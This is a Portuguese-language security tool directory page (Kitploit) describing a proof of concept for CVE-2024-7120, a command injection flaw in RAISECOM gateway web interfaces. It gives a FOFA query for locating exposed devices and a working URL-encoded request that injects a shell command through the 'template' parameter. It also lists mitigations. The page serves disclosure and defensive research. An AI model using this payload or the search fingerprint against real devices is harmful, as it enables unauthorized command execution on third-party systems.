Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-7120 — ⚠️⚠️ CVE-2024-7120 Vulnerabilidade de Injeção de Comando em RAISECOM Gateway Devices | Kitploit
Ferramentas/GitHubGitHub/gh-ost00/cve-2024-7120
Segurança IoTAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubgh-ost00/cve-2024-7120

CVE-2024-7120

⚠️⚠️ CVE-2024-7120 Vulnerabilidade de Injeção de Comando em RAISECOM Gateway Devices

Ver Repositório
82há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Raisecom Dispositivos Injeção de Comando (CVE-2024-7120) Prova de conceito!

Visão Geral

Uma vulnerabilidade de injeção de comando foi identificada nos dispositivos RAISECOM Gateway, afetando os modelos MSG1200, MSG2100E, MSG2200 e MSG2300. Essa vulnerabilidade permite que atacantes remotos executem comandos arbitrários no sistema através da interface web. O problema reside no script list_base_config.php, especificamente através do parâmetro template, afetando mais de 25.112 dispositivos na Internet.

✔ FOFA : title="web user login" && body="<META content="MSHTML 6.00.2900.5583" name=GENERATOR>"

banner

Dispositivos Afetados

Hardware

  • Modelos RAISECOM Gateway MSG1200, MSG2100E, MSG2200, MSG2300

Software

  • 3.90

Componentes Afetados

URI: /vpn/list_base_config.php

Descrição: o list_base_config.php é um componente de interface web dos dispositivos RAISECOM Gateway usado para gerenciar configurações de VPN. A vulnerabilidade identificada surge devido ao tratamento inadequado do parâmetro template neste script. Esse parâmetro pode ser explorado para executar comandos arbitrários no sistema operacional do dispositivo devido à sanitização insuficiente de entrada.

CWE

CWE-77: Injeção de Comando

Exploração

Aqui está um exemplo de como a vulnerabilidade pode ser explorada usando um comando curl:

root@kitploit:~
GET "http://host.com/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{Created by Ghost sec}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60"

Neste exemplo, o comando curl envia uma solicitação HTTP GET maliciosa ao script list_base_config.php. A solicitação utiliza o parâmetro template para executar um comando.

Resultado Real

Amostra 1

banner

Amostra 2

banner

Recomendações

  1. Validação de Entrada: Implemente verificações rigorosas de validação em todas as entradas do usuário, especialmente aquelas que podem afetar comandos do sistema ou caminhos de arquivos.
  2. Controles de Acesso: Restrinja o acesso à interface web do dispositivo a redes confiáveis e usuários autenticados.
Baixar ferramenta